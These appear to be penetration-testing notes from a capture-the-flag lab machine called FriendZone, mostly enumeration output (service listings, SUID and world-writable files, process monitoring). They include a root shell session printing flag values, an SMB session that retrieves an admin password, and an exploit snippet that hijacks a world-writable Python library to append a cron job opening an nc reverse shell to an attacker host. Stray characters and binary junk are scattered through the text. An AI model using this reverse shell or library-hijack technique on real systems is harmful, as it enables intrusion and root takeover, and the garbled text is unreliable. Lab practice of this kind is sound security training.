Jul 20 2018 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Jul 20 2018 urandom.service -> systemd-random-seed.service -rw-r--r-- 1 root root 593 Jul 20 2018 user@.service lrwxrwxrwx 1 root root 9 Jul 20 2018 x11-common.service -> /dev/null -rw-r--r-- 1 root root 238 Jul 9 201O8 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 Jul 9 2018 apt-daily-upgrade.timer -rw-r--r-- 1 root root 326 Jul 9 2018 apt-daily.service -rw-r--r-- 1 root root 156 Jul 9 2018 apt-daily.timer -rw-r--r-- 1 root root 266 Jul 5 2018 netplan-wpa@.service -rw-r--r-- 1 root root 528 Jun 27 2018 apache-htcacheclean.service -rw-r--r-- 1 root root 537 Jun 27 2018 apache-htcacheclean@.service -rw-r--r-- 1 root root 346 Jun 27 2018 apache2.service -rw-r--r-- 1 root root 418 Jun 27 2018 apache2@.service -rw-r--r-- 1 root root 342 Jun 22 2018 getty-static.service -rw-r--r-- 1 root root 362 Jun 22 2018 ondemand.service -rw-r--r-- 1 root root 258 Jun 19 2018 networkd-dispatcher.service -rw-r--r-- 1 root root 92 May 16 2018 fstrim.service -rw-r--r-- 1 root root 170 May 16 2018 fstrim.timer -rw-r--r-- 1 root root 189 May 16 2018 uuidd.service -rw-r--r-- 1 root root 126 May 16 2018 uuidd.socket -rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service drwxr-xr-x 2 root root 4.0K ApPr 20 2018 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants -rw-r--r-- 1 root root 808 Mar 29 2018 friendly-recovery.service -rw-r--r-- 1 root root 350 Mar 23 2018 bind9-pkcs11.service -rw-r--r-- 1 root root 324 Mar 23 2018 bind9.service -rw-r--r-- 1 root root 370 Mar 23 2018 bind9-resolvconf.service -rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service -rw-r--r-- 1 root root 287 Feb 16 2018 keyboard-setup.service -rw-r--r-- 1 root root 312 Feb 16 2018 console-setup.service -rw-r--r-- 1 root root 919 Jan 28 2018 basic.target -rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target -rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target -rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target -rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount Q-rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount -rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target -rw-r--r-- 1 root root 541 Jan 28 2018 exit.target -rw-r--r-- 1 root root 480 Jan 28 2018 final.target -rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target -rw-r--r-- 1 root root 500 Jan 28 2018 getty.target -rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target -rw-r--r-- 1 root root 527 Jan 28 2018 halt.target -rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target -rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target -rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target -rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-device.target -rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target -rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target -rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target -rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target -rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target -rw-r--r-- 1 root root 547 JaRn 28 2018 local-fs.target -rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice -rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target -rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target -rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target -rw-r--r-- 1 root root 521 Jan 28 2018 network.target -rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target -rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target -rw-r--r-- 1 root root 394 Jan 28 2018 paths.target -rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target -rw-r--r-- 1 root root 417 Jan 28 2018 printer.target -rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target -rw-r--r-- 1 root root 549 Jan 28 2018 remote-cryptsetup.target -rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target -rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target -rw-r--r-- 1 root root S 492 Jan 28 2018 rescue.target -rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target -rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target -rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target -rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target -rw-r--r-- 1 root root 449 Jan 28 2018 slices.target -rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target -rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target -rw-r--r-- 1 root root 420 Jan 28 2018 sound.target -rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target -rw-r--r-- 1 root root 393 Jan 28 2018 swap.target -rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-config.mount -rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-debug.mount -rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target -rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket -rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target -rw-r--r-- 1 root root 445 Jan 28 2018 system.slice -rw-r--Tr-- 1 root root 704 Jan 28 2018 systemd-ask-password-console.path -rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path -rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket -rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 882 Jan 28 2018 systemd-journald.socket -rw-r--r-- 1 root root 631 Jan 28 2018 systemd-networkd.socket -rw-r--r-- 1 root root 657 Jan 28 2018 systemd-rfkill.socket -rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-control.socket -rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target -rw-r--r-- 1 root root 445 Jan 28 2018 timers.target -rw-r--r-- 1 root root 457 Jan 28 2018 umount.target -rw-r--r-- 1 root root 432 Jan 28 2018 user.slice -rw-r--r-- 1 root root 493 Jan 26 2018 ssh.service -rw-r--r-- 1 root root 244 Jan 26 2018 ssh@.service lrwxrwxrwx 1 rUoot root 9 Jan 18 2018 sudo.service -> /dev/null -rw-r--r-- 1 root root 155 Jan 18 2018 phpsessionclean.service -rw-r--r-- 1 root root 144 Jan 18 2018 phpsessionclean.timer -rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket -rw-r--r-- 1 root root 741 Dec 18 2017 accounts-daemon.service -rw-r--r-- 1 root root 368 Dec 11 2017 irqbalance.service -rw-r--r-- 1 root root 251 Nov 16 2017 cron.service -rw-r--r-- 1 root root 505 Nov 16 2017 dbus.service -rw-r--r-- 1 root root 106 Nov 16 2017 dbus.socket -rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service -rw-r--r-- 1 root root 250 Aug 15 2017 ureadahead-stop.service -rw-r--r-- 1 root root 242 Aug 15 2017 ureadahead-stop.timer -rw-r--r-- 1 root root 401 Aug 15 2017 ureadahead.service -rw-r--r-- 1 root root 330 Aug 10 2017 setvtrgb.service -rw-r--r-- 1 root root 248 Jul 27 2014 vsftpd.service -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Jun 27 201V8 apache2-systemd.conf /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 24 Sep 12 2018 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 12 2018 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 31 Sep 12 2018 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/systemd/system/kexec.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 12 2018 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 29 Sep 12 2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service lrwxrwxrwx 1 root root 24 Sep 12 2018 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx 1 root root 15 Jul 20 2018 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Jul 20 2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root roWot 25 Jul 20 2018 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Jul 20 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Jul 20 2018 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Nov 16 2017 dbus.service -> ../dbus.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 28 Sep 12 2018 plymouth-poweroff.service -> ../plymouth-poweroff.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 26 Sep 12 2018 plymouth-reboot.service -> ../plymouth-reboot.service /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 30 Sep 12 2018 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx 1 root root 25 Sep 12 2018 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 20 Jul 20 2018 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx X1 root root 22 Jul 20 2018 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Jul 20 2018 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Jul 20 2018 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Jul 20 2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Jul 20 2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Jul 20 2018 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Jul 20 2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Jul 20 2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Jul 20 2018 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 30 Jul 20 2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 32 Jul 20 Y 2018 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 27 Jul 20 2018 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 36 Jul 20 2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Jul 20 2018 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Jul 20 2018 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Jul 20 2018 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Jul 20 2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Jul 20 2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 31 Jul 20 2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 24 Jul 20 2018 systemd-udevd.service -> ../systemd-udevd.service lZrwxrwxrwx 1 root root 30 Jul 20 2018 systemd-update-utmp.service -> ../systemd-update-utmp.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Jul 20 2018 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 20 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Jul 20 2018 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 20 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 25 Jul 20 2018 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Jul 20 2018 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 3[4 Jul 20 2018 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Jul 20 2018 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 31 Jul 20 2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Jul 20 2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 14 Nov 16 2017 dbus.socket -> ../dbus.socket /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Jul 20 2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: total 4.0K -rw-r--r-- 1 root root 290 Jun 22 2018 debian.conf /lib/systemd/system/user@.service.d: total 4.0K -rw-r--r-- 1 root root 125 Jun 22 2018 timeout.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.ta\rget.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/system-sleep: total 4.0K -rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm /lib/systemd/network: total 16K -rw-r--r-- 1 root root 645 Jan 28 2018 80-container-host0.network -rw-r--r-- 1 root root 718 Jan 28 2018 80-container-ve.network -rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network -rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link /lib/systemd/system-generators: total 192K -rwxr-xr-x 1 root root 23K Jul 20 2018 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-debug-generator -rwxr-xr-x 1 root root 31K Jul 20 2018 systemd-fstab-generator -rwxr-xr-x 1 root root 14K Jul 20 2018 systemd-getty-generator -rwxr-xr-x 1 root root 22K Jul 20 2018 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-rc-local-generator -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-system-update-ge]nerator -rwxr-xr-x 1 root root 31K Jul 20 2018 systemd-sysv-generator -rwxr-xr-x 1 root root 14K Jul 20 2018 systemd-veritysetup-generator lrwxrwxrwx 1 root root 22 Jul 5 2018 netplan -> ../../netplan/generate /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset /lib/systemd/system-shutdown: total 0 ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.21p2 [-] Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2018-10-03T14:41:08 [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Action '-M' failed. The Apache error log may have more information. [-] www home dir contents: /var/www/: total 36K drwxr-xr-x 8 root root 4.0K Oct 6 2018 . drwxr-xr-x 12 root root 4.0K Oct 6 2018 .. drwxr-xr-x 3 root root 4.0K Jan 16 2019 admin drwxr-xr-x 4 root^ root 4.0K Oct 6 2018 friendzone drwxr-xr-x 2 root root 4.0K Oct 6 2018 friendzoneportal drwxr-xr-x 2 root root 4.0K Jan 15 2019 friendzoneportaladmin drwxr-xr-x 3 root root 4.0K Oct 6 2018 html -rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf drwxr-xr-x 3 root root 4.0K Oct 6 2018 uploads /var/www/admin: total 28K drwxr-xr-x 3 root root 4.0K Jan 16 2019 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 1.2K Jan 16 2019 dashboard.php drwxr-xr-x 2 root root 4.0K Oct 6 2018 images -rw-r--r-- 1 root root 2.9K Oct 6 2018 index.html -rw-r--r-- 1 root root 384 Oct 7 2018 login.php -rw-r--r-- 1 root root 89 Oct 7 2018 timestamp.php /var/www/admin/images: total 420K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 3 root root 4.0K Jan 16 2019 .. -rw-r--r-- 1 root root 12K Aug 31 2015 a.jpg -rw-r--r-- 1 root root 392K May 28 2015 b.jpg /var/www/friendzone: total 2.2M drwxr-xr-x 4 root root 4.0K Oct 6 2018 . drwxr-xr-x 8 root root 4.0K Oct 6 2018_ .. drwxr-xr-x 2 root root 4.0K Oct 6 2018 admin -rw-r--r-- 1 root root 2.1M Mar 14 2017 e.gif -rw-r--r-- 1 root root 238 Oct 6 2018 index.html drwxr-xr-x 3 root root 4.0K Oct 6 2018 js /var/www/friendzone/admin: total 8.0K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 4 root root 4.0K Oct 6 2018 .. /var/www/friendzone/js: total 12K drwxr-xr-x 3 root root 4.0K Oct 6 2018 . drwxr-xr-x 4 root root 4.0K Oct 6 2018 .. drwxr-xr-x 2 root root 4.0K Oct 6 2018 js /var/www/friendzone/js/js: total 12K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 3 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 716 Oct 6 2018 index.php /var/www/friendzoneportal: total 380K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 66 Oct 6 2018 index.html -rw-r--r-- 1 root root 367K Nov 19 2017 z.gif /var/www/friendzoneportaladmin: total 16K drwxr-xr-x 2 root root 4.0K Jan 15 2019 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. -rw`-r--r-- 1 root root 379 Oct 6 2018 index.html -rw-r--r-- 1 root root 294 Oct 6 2018 login.php /var/www/html: total 60K drwxr-xr-x 3 root root 4.0K Oct 6 2018 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 21K Oct 5 2018 fz.jpg -rw-r--r-- 1 root root 11K Oct 5 2018 index.bak -rw-r--r-- 1 root root 324 Oct 6 2018 index.html -rw-r--r-- 1 root root 13 Oct 5 2018 robots.txt drwxr-xr-x 2 root root 4.0K Oct 5 2018 wordpress /var/www/html/wordpress: total 8.0K drwxr-xr-x 2 root root 4.0K Oct 5 2018 . drwxr-xr-x 3 root root 4.0K Oct 6 2018 .. /var/www/uploads: total 20K drwxr-xr-x 3 root root 4.0K Oct 6 2018 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. drwxr-xr-x 2 root root 4.0K Oct 6 2018 files -rw-r--r-- 1 root root 391 Oct 6 2018 index.html -rw-r--r-- 1 root root 195 Oct 6 2018 upload.php /var/www/uploads/files: total 12K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 3 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 0 Oct 6 2018a index.html -rw-r--r-- 1 root root 20 Oct 6 2018 note ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1513 Oct 6 2018 /etc/passwd -rw-r--r-- 1 root root 789 Jan 23 2019 /etc/group -rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile -rw-r----- 1 root shadow 994 Oct 10 2018 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 26696 May 16 2018 /bin/umount -rwsr-xr-x 1 root root 43088 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su -rwsr-xr-x 1 root root 146128 Nov 30 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 64424 Mar 10 2017 /bin/ping -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd -rwsr-xr-x 1 root root 18448 Mar 10 2017 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp -rwsr-xrb-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn -rwsr-xr-x 1 root root 1140200 Feb 14 2018 /usr/sbin/exim4 -rwsr-xr-- 1 root messagebus 42992 Nov 16 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 436552 Feb 10 2018 /usr/lib/openssh/ssh-keysign [-] SGID files: -rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/unix_chkpwd -rwxr-sr-x 1 root ssh 362640 Feb 10 2018 /usr/bin/ssh-agent -rwxr-sr-x 1 root tty 30800 May 16 2018 /usr/bin/wall -rwxr-sr-x 1 root shadow 22808 Jan 25 2018 /usr/bin/expiry -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root mail 10952 Nov 7 2017 /usr/bin/dotlock.mailutils -rwxr-sr-x 1 root crontab 39c352 Nov 16 2017 /usr/bin/crontab -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 71816 Jan 25 2018 /usr/bin/chage [+] Files with POSIX capabilities set: /usr/bin/mtr-packet = cap_net_raw+ep [-] World-writable files (excluding /proc and /sys): -rwxrw-rw- 1 nobody nogroup 5493 Apr 2 16:43 /etc/Development/phprs.php -rwxrwxrwx 1 www-data www-data 46631 Mar 23 03:36 /tmp/LinEnum.sh -rw-rw-rw- 1 www-data www-data 73679 Apr 2 17:01 /tmp/output.txt -rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py [-] NFS displaying partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> &dlt;dump> <pass> # / was on /dev/sda1 during installation UUID=6866a7bf-1c66-4a90-9368-cd99788a8d4a / ext4 errors=remount-ro 0 1 /swapfile none swap sw 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was ENTERED [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf -rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf -rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf -rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf -rw-r--r-- 1 root root 552 Apr 5 2018 /etc/pam.conf -rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf -rw-r--r-- 1 root root 5898 Oct 5 2018 /etc/ca-certificates.conf -rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf -rw-r--r-e- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf -rw-r--r-- 1 root root 191 Feb 8 2018 /etc/libaudit.conf -rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 144 Oct 5 2018 /etc/kernel-img.conf -rw-r--r-- 1 root root 2683 Jan 18 2018 /etc/sysctl.conf -rw-r--r-- 1 root root 5850 Feb 5 2018 /etc/vsftpd.conf -rw-r--r-- 1 root root 3028 Oct 5 2018 /etc/adduser.conf -rw-r--r-- 1 root root 513 Oct 5 2018 /etc/nsswitch.conf -rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf -rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf -rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf -rw-r--r-- 1 root root 350 Oct 5 2018 /etc/popularity-contest.conf [-] Location and contents (if accessible) of .bash_history file(s): /home/friend/.bash_history [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root root 1513 Oct 6 2018 /var/backups/passwd.bak -rw------- 1 root root 789 Jan 23 2019 /var/backups/group.bak -rw------- 1 root shadow 994 Oct 10 2018 /var/backups/shadow.bak -rw------- 1 root shadow 659 Jan 23 2019 /var/backups/gshadow.bak -rw-r--r-- 1 root root 10918 Oct 5 2018 /var/www/html/index.bak [-] Any interesting mail in /var/mail: total 12 drwxrwsr-x 2 root mail 4096 Jan 15 2019 . drwxr-xr-x 12 root root 4096 Oct 6 2018 .. -rw-rw---- 1 friend mail 1 Jan 15 2019 friend ### SCAN COMPLETE #################################### PSPY32S 2020/04/02 17:17:09 CMD: UID=0 PID=1 | /sbin/init splash 2020/04/02 17:18:01 CMD: UID=0 PID=14450 | /usr/bin/python /opt/server_admin/reporter.py 2020/04/02 17:18:01 CMD: UID=0 PID=14449 | /bin/sh -c /opt/server_admin/reporter.py 2020/04/02 17:18:01 CMD: UID=0 PID=14448 | /usr/sbin/CRON -f custom-colorsXAIZ|xAס~.5?g root@FriendZone:~# whoami whoami root h root@FriendZone:~# ifconfig ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 i inet 10.10.10.123 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 fe80::250:56ff:feb9:df8e prefixlen 64 scopeid 0x20<link> inet6 dead:beef::250:56ff:feb9:df8e prefixlen 64 scopeid 0x0<global> j ether 00:50:56:b9:df:8e txqueuelen 1000 (Ethernet) RX packets 66239 bytes 6095671 (6.0 MB) RX errors 0 dropped 99 overruns 0 frame 0 TkX packets 42031 bytes 6032466 (6.0 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 l lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> m loop txqueuelen 1000 (Local Loopback) RX packets 55224 bytes 3756276 (3.7 MB) RX errors 0 dropped 0 overruns 0 frame 0 n TX packets 55224 bytes 3756276 (3.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 o root@FriendZone:~# cat /root/root.txt cat /root/root.txt b0e6c60b82cf96e9855ac1656a9e90c7 root@FriendZone:~# cat /home/friend/user.txt cat /home/friend/user.txt a9ed20acecd6c5b6b52f474e15ae9a11 root@FriendZone:~# custom-colors$Aס}7L reporter.py and os.py Vulnerability Type: Permissions configuration Exploit POC: Description: Discovery of Vulnerability PSPY32S Output in “Script Results” Exploit Code Used Replace /usr/lib/Python2.7/os.py with shell = ''' * * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f ''' f = open('/etc/crontab','a') f.write(shell) f.close() Wait from cron job to run reporter.py Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAס~>\)ndZone Samba Server Files /etc/Files general Disk FriendZone Samba Server Files Development Disk FriendZone Samba Server Files IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available smbclient -N \\\\10.10.10.123\\general Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jan 16 15:10:51 2019 .. D 0 Wed Jan 23 16:51:02 2019 creds.txt N 57 Tue Oct 9 19:52:42 2018 9221460 blocks of size 1024. 6458412 blocks available smb: \> get creds.txt getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) smb: \> exit kali@kali:~/Friendzone$ cat creds.txt creds for the admin THING: admin:WORKWORKHhallelujah@# custom-colorsA[PAס| 55/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List 